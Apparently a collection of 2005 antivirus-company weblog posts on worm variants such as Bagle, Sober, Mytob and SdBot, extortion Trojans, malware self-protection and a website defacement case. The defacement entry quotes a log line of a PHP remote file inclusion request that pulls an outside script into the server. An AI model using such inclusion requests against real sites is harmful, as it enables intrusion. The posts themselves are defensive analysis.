During the past hours, we've intercepted a flurry of new Bagle variants; apparently, it's been a busy day for the author, who keeps sending them out.

Additionally, one of the URLs which all these variants monitor for updates has come online, with yet another (yes, you've guessed) Bagle variant - Bagle.bp.

So far the situation appears under control - the speed of reaction from antivirus companies in this case was outstanding. Except for the initial seeding waves, there is no sign of an outbreak. Stay tuned for more details.

Two new Bagle variants have been spotted today. Both are 36352 bytes in size and are very similar in operation. Actually, the second one looks like a repack of the first variant in order to avoid detection. Both work through a downloader component, which connects to a set of websites and attempts to fetch a file. Just as it usually happens with Sober, the author may choose to upload a trojan with unexepected effects at the "update" URLs. We are currently monitoring them for any changes.

Below you can find the MD5's for these two new variants:

(Email-Worm.Win32.Bagle.bo)

f4271a7bd37b7502ecab0ec2964d87c6 - first sample
71379e8529c54c80ead31f5499e3406b - second sample

We released detection for the most recent version at 18:59.

[update] A description for Bagle.bo is now available in the Virus Encyclopedia.

I read about a case of computer fraud last weekend in an unlikely place: the parish bulletin of my local church. It seems that the priest's name, and the postal address of the church, are being used in a way that is part 419 fraud, part identity theft and part phishing scam.

Unsolicited email is being sent from fake, though plausible, e-mail addresses. The email is apparently 'signed' by the priest and tells the recipients about a legacy they are about to receive, or asks for help in a financial transaction or simply asks for a donation.

The priest found out about it when someone in Australia decided to do some checking. He has reported the fraud to the police and the fake email accounts known so far (there may, of course, be others) have been closed down.

I'll keep you posted about any developments.

Today we've been getting more and more reports of a particular Backdoor.Win32.SdBot variant spreading.

This SdBot is packed using UPX, Upolyx and Morphine, we detect it using our generic signature as Backdoor.Win32.SdBot.gen.

This is a true hybrid worm as it contains many functions, firstly the IRCBot which can spread over the network, next to this it has got AIM and P2P spreading capabilities.
Embedded in the bot is an IM-Worm.Win32.Kelvir variant and a rootkit to stealth the presence on the system.

This worm has been actively spreading over IRC yesterday and today the target seemed the MSN network, both as a link to a website.
Luckily the offending website has been taken down now, but that hasn't prevented a major spread. I received quite a lot of reports from the Netherlands.

The danger is not over as this complete package is dificult to get off the system. Kaspersky Anti-Virus users were proactively protected from installation onto the system.

In the last week or so, new trends in using IM (instant messaging) applications to spread malicious code have been on the rise.

Firstly, we've been seeing IRCBots which have the ability to spread via AOL Instant Messenger.

Some of these bots get classified as IM-Worms. But in my opinion, these are standard IRCBots which we see every day. It's just that they have added functionality and the remote malicious user has the ability to tell the bot to start the IM spreading routine.

The bot's code contains a text sentence, which in turn contains an html link. The remote malicious user fills this link with the url of his/ her choice - what the AOL user receives is the sentence complete with link. There's a wide variety of sentences used.

As AIM supports HTML, it's not surprising that it's being exploited for malicious purposes. And it's yet another reason not to use HTML in normal messaging.

Secondly, we've spotted a new version of IM-Worm.Win32.Bropia, Bropia.ad, which utilizes yet another tactic.

Bropia.ad copies itself - using a range of different filenames - to the shared directories of popular P2P programs, which obviously means it has P2P-Worm capabilities.

As P2P is a popular way of spreading and not that difficult to implement, the addition of such a propagation routine was only a matter of time.

Now we're on the lookout for the next new tactic which blackhats will think up. As IM malware continues to evolve, new approaches are a matter of sooner, rather than later.

Exactly a year ago Rugrat, the first virus for Win64 platforms, was detected: Virus.Win64.Rugrat.a was a proof of concept virus written in assembler for IA64. As the first of its kind, it naturally attracted the attention of antivirus companies.

Rugrat was written by a member of 29A, the international group which specializes in producing proof-of-concept code. The author of Rugrat also created the Virus.Win32.Chiton family.

Although Rugrat was interesting as the first of its kind, it never became widespread, because Win64 users are few and far between.

While we're on the subject of the Aids Information Disk ...

I recall a cautionary tale told by someone who called into the company I worked for then (a UK anti-virus company that has since been acquired by another well-known company). The caller had received one of the Trojan floppy disks. He was suspicious about it, so he threw it in the bin. Good idea, right? Unfortunately, one of his employees decided to retrieve the disk and run the program, with predictable results.

At the time, I was new to the security industry. And this story served to reinforce the 'proper paranoid attitude' cultivated by the company I worked for: assume nothing and leave nothing to chance! It also reinforced the message about backups, and that message is as valid today as it was then. The payload of Trojans like Virus.Win32.GPCode highlights the importance of taking backups (along with having an up-to-date antivirus, a personal firewall and patched systems).

Anyone who has ever lost data understands how important it is to backup regularly.

There have been a number of recent reports of a new attempt to extort money from computer users. It's done using a piece of malware which, once installed on the victim machine, encrypts the user's data and drops a text file into each directory demanding $200 for a decryption key (the money to be wired to a specified Internet bank account).

Kaspersky Lab added detection for this code, which we detect as Virus.Win32.GPCode.b, on 20 May. And we added detection for similar code, Virus.Win32.GPCode.a, in December 2004. At the time, Yury posted a weblog entry about it. Not only do we detect the code, but we also decrypt the files.

Of course, this is not the first attempt to use malware to extort money. There have been other reports during the last two years of Trojans used by the criminal underground to try and extort money from large corporations by launching DDoS (Distributed Denial of Service) attacks.

And going even further back, in late 1989 the Aids Information Trojan was sent out on floppy disk by a company calling itself 'PC Cyborg'. This Trojan encrypted the contents of the victim's hard disk after 90 re-boots, leaving just a README file containing a bill and a PO Box address in Panama to which payment was to be sent. Dr Joseph Popp, the alleged author of the Trojan, was later extradited to the UK. However, he was deemed unfit to stand trial following his behaviour in court (although an Italian court later found him guilty in absentia).

We've been seeing a lot of new Mytob variants recently. It's less than three months since we added detection for Mytob.a and already we're well into double figures. In the last day or so we've added detection for Mytob.au (and there's a lot of Mytob.au out there!), Mytob.av and Mytob.aw. If it were not for generic signatures, there would be a lot more!

Generic detection lets us detect multiple variants of the same malware family using a single virus definition ... sometimes tens or even hundreds of threats! The use of hundreds of unpackers within the Kaspersky® antivirus engine has the same effect: re-packed variants are often detected without the need for a new definition.

The down side is that the suffix used to identify some new threats may not match that used by other antivirus vendors. This is especially true for 'successful' threats that spawn large numbers of variants.

In the meantime Sober.q has become active, instead of sending copies it's sending spam messages now.

This is quite the opposite from the message the Sober author included in his latest creation.

These spam messages link to right winged articles.

So in a way we're seeing the same story as with Sober.g again.
Sober.g downloaded Sober.h, Sober.h in turn also sent out spam.

I can remember that the Netherlands were completely flooded by those emails back then, judging from the numbers that Sober.p generated just before it stopped it probably won't be that much different this time.

After some analysis it seems that Sober.q hasn't yet begun spreading, yet.

Probably the author only wants the Worm to start spreading when enough computers have been infected with it.

That way it may prove more effective, but it also opens up a bigger window of oppertunity for the anti-virus vendors to respond.

The other interesting thing about Sober.q is that it contains a message. It's a message in German in which the author refers to some online articles which state he is a spammer. He states that he is not a spammer, but might turn into one.

It's not the first time the Sober author has enclosed a message into his creations, a previous message was aimed at the anti-virus vendors.

We have just detected a new Email-Worm.Win32.Sober variant, we detect it as Sober.q.

Sober.q is being downloaded by Sober.p infected computers, from there on it will start spreading. Another outbreak is not unlikely, we are watching the situation closely.

An urgent update has just been shipped.

Trojan-Downloader.Win32.BMPAgent.a appeared exactly a year ago today.

This Trojan downloader was interesting, as it came in a new package - it arrived as a BMP file. When the file was viewed, the malicious code contained within the image would be launched, which would in turn download and install other files to the victim machine.

Agent was written to exploit a vulnerability in the way in which certain versions of Internet Explorer/ Outlook Express process graphics files. Three months after the vulnerability was detected, Microsoft issued a patch for the vulnerability.

Although Agent had a novel approach, it never became really widespread, in great part due to the fact that Microsoft patched the vulnerability.

The Fire of London began on the night of September 2, 1666, as a small fire on Pudding Lane, in the bakeshop of Thomas Farynor, who was King Charles 2nd's baker. The story goes that one of the servants woke up around midnight to find the house on fire. By eight o'clock the next day, the fire had spread halfway across London Bridge, destroying around 80% of the city and killing nearly a fifth of the population. An example of how quickly a minor incident can turn into a major disaster.

The Mozilla Foundation Security Advisories 2005-43 and 2005-44 deal with two serious vulnerabilities which can be found in the popular Firefox browsers, versions up to 1.0.3, included. The vulnerability was announced last weekend, and it's taken the Firefox developers a long four days to come out with a patch, test it and release it to the public.

In a normal development cycle, four days from patch development to release a fix is an extremely short period of time. In comparison, Internet Explorer patches are released on a monthly basis, and it's not uncommon to wait as long as three weeks for a fix to a critical security bug. Of course, this methodical development cycle is one of the reasons why many users have switched to Firefox, and it's encouraging to see the level of dedication and commitment the Mozilla developers put into maintaining the security of their products.

In a world where virus writers, adware developers and hackers are constantly searching for ways to infect your systems, a timely response to security issues is a must. Sometimes even a day, or why not, an extra hour can matter. And sure enough, there are reports of the above mentioned Firefox bugs already being exploited on the Internet. I don't want to think what might have happened if we had had to wait another another month for the patch.

You can get the Firefox 1.0.4 update here.

A few days ago we mentioned the protection mechanism that Sober uses to keep anti-virus programs from detecting it. Such mechanisms are actually fairly common these days.

They are frequently used by adware and adware related Trojans. These techniques have evolved over time and are getting very sophisticated. So antivirus vendors are having to work hard to combat these new methods.

There's a range of interesting examples.

When some AdWare companies realised that antivirus solutions could easily delete their software, they first resorted to multiple processes guarding each other.
If either process/file is deleted, the other one would automatically respawn it. This technique is still being used in an enhanced form.

Of course there's the Sober approach: protecting a file in such a manner that it can't be scanned. For instance, some versions of Trojan-Downloader.Win32.Istbar do this, and have an additional mechanism which aims to prevent the process memory from being scanned.

A version of AdWare.Isearch effectively re-introduced an old technique.
It makes use of a .sys driver which write-protects its files. This means that an antivirus can detect the files, but not delete them. These .sys drivers are also used to hide malware and its activities - resulting in the very popular rootkits.

There are many more examples of ways how malware tries to protect itself. It's very clear that such techniques are placing pressure on security vendors to push the envelope in detection.

The use of .sys drivers has been increasing over the past few months. We are now at a point where open source IRCBots are also using this functionality to hide their presence in infected systems and this is a very worrying trend.

Sober.p currently is not spreading. After days of sending out emails, it's now checking for updates at predefined locations, which indicates that more malware is likely to follow.

But one week after Email-Worm.Win32.Sober.p's initial sighting it seemed more prevalent than ever. Why is this?

Firstly, the worm's continued spread shows that there still aren't enough companies running antivirus solutions on their mail servers as they could have stopped the spreading days ago.

Secondly, from a social engineering point of view it's pretty good. The bilingual messages - English and German - always seem to have a certain amount of success - almost all Sober variants have hit Germany and the countries surrounding it very hard.

This time Sober also takes advantage of the World Cup football which will be held in Germany in 2006. However, my personal email addresses were bombarded with Sober.p emails, yet I didn't receive a single sample regarding the World Cup.

Other email worms which have used similar social engineering tactics haven't been this successful by a long shot. I think Sober.p's real success is due to something else, namely its protection mechanism.

As with previous Sober variants, Sober.p makes use of a certain mechanism to lock out any I/O access to its files.
In other words: Other programs can't access Sober's files. Not even applications running under SYSTEM account can access them while Sober is resident in memory.
This mechanism has been improved over time - earlier variants of Sober couldn't stop SYSTEM from accessing its files.

And what's the result? Very simple; if something can't be scanned, then malicious code can't be detected. This rules out the chance of Sober being detected while running an on-demand scan. So what now? This is where the quality of an anti-virus's memory scanner comes in.

First the solution needs to detect Sober running in memory, then it has to kill the processes.
This is where some antivirus programs are failing; either they don't have a memory scanner, or the scanner has limited functionality which isn't able to kill the processes.

If you aren't aware of infection, how can you take measures against it? With Sober's protection mechanism making it able to outsmart some antivirus scanners, it's likely we haven't seen the last of this family yet.

Yesterday, a website where one of my friends is a webmaster was hacked. Actually, to be more precise, the site was "defaced", meaning the hacker replaced the standard entry page with one of his choice. Such replacement pages usually proclaim the hacker's intelligence and technical "skillz". This is an extremely popular technique and some hackers even warn the site owners before doing it, giving them a fair chance to close the bug.

Generally speaking, when a site is hacked the first step is locate the exact method which was used by the attacker and immediately close any loopholes. Of course, preserving logs and how the hacked site looks is also essential, if legal action needs to be taken later. Finally, it is important to determine if the hacker installed a backdoor, which allows later access to the system even if the security hole was closed, and kill it.

My friends' site was hosted by a serious ISP and the machine itself was running the latest versions of Linux, Apache, PHP, MySQL, SSH, Perl and every other popular piece of software which comes by default in a standard hosting account.
Therefore, it was obvious from the start that the chance of having been attacked through a flaw in the hosting system was close to zero.

After poking through the logs for a little while, we located the first index reload after the hack and noticed that it was coming through a free anonymous proxy-based browsing service. Being a site about photography and art in general, it seemed to me that it was unlikely for somebody to browse it through an anonymizer service. I did a quick search for all the entries coming from the respective anonymous proxy IP address, and sure enough, the following did seem interesting:

82.96.x.x - - [07/May/2005:00:53:36 -0700] "GET /x_open.php?art=http://geocities.com/...[true link removed]

"x_open.php" from above is a general purpose script which integrates new articles in the site layout. Basically, it takes an article and draws a menu, a toolbar and other page components around it. The bug? Well, the PHP directive "include" doesn't care if the parameter is a local file or a remote one. It will happily download something remote, and execute it on the local machine within the context of the initial script. The same is true for many other PHP functions, which are powerful enough to handle a local or a remote file in the same manner. When the PHP code for my friends' website was written, the programmer probably forgot about this "feature"; the code created was seriously flawed, leaving the server vulnerable. It took only a few months before a hacker noted the peculiar URL structure (.php script receiving another .php script as parameter) and misused it to deface the website.

We've repaired the code to prevent opening of arbitrary files from the web or even the local machine, fixed the same bug in a dozen other scripts, sent a complaint to Geocities for hosting the trojan PHP script which was injected in the server and contacted the owners of anonymous proxy forwarder to obtain the original IP address used by the hacker. With a little bit of luck, we'll be able to locate the attacker and thank him accordingly.

As for the morale of this story? Well, PHP is a very powerful programming language and it can be used to design really wonderful things - the software equivalent of a very sharp cutting tool. Yet, if not used properly, it can be just as dangerous.

With that in mind, PHPBB has just released version 2.0.15 which fixes (between other things) one serious bug. If you run PHPBB, update as soon as possible: Download PHPBB 2.0.15

Social engineering, a non-technical breach of security that relies heavily on human interaction and tricks users into breaking normal security measures, remains popular among virus writers.

Five years ago today LoveLetter was detected. The worm first appeared in the far east and quickly reached epidemic proportions.

LoveLetter was one of the first, and most notable, examples of social engineering. It arrived as an attachment to an innocent looking e-mail containing the subject line 'I LOVE YOU' (and who doesn't like to receive a love letter?) and the body text 'Kindly check the attached LOVELETTER coming from me'.

In an effort to put unsuspecting users further off their guard, the attachment had a double extension, LOVE-LETTER-FOR-YOU.TXT.vbs. Since Windows Explorer doesn't show extensions by default, it was not obvious that the attachment was anything more than a plain text file. For good measure, LoveLetter also used mIRC to spread and downloaded a password stealing Trojan to the infected machine.

Successful threats (from the author's point of view, that is) typically spawn further variants. LoveLetter's success, together with the fact that the VBS source code for the worm was easily accessible, led to a large number of variants in the months following its release.

Loveletter showed how useful social engineering can be in spreading malware. So it's not surprising that it continues to be widely used. Sober.p, which has caused outbreaks in various western European countries, owes some of its success to social engineering. It arrives as an attachment to infected messages which use a range of subject headers, messages and attachment names in both English and German. Some of the messages appear to promise tickets to the World Cup in 2006 - and who wouldn't want World Cup tickets?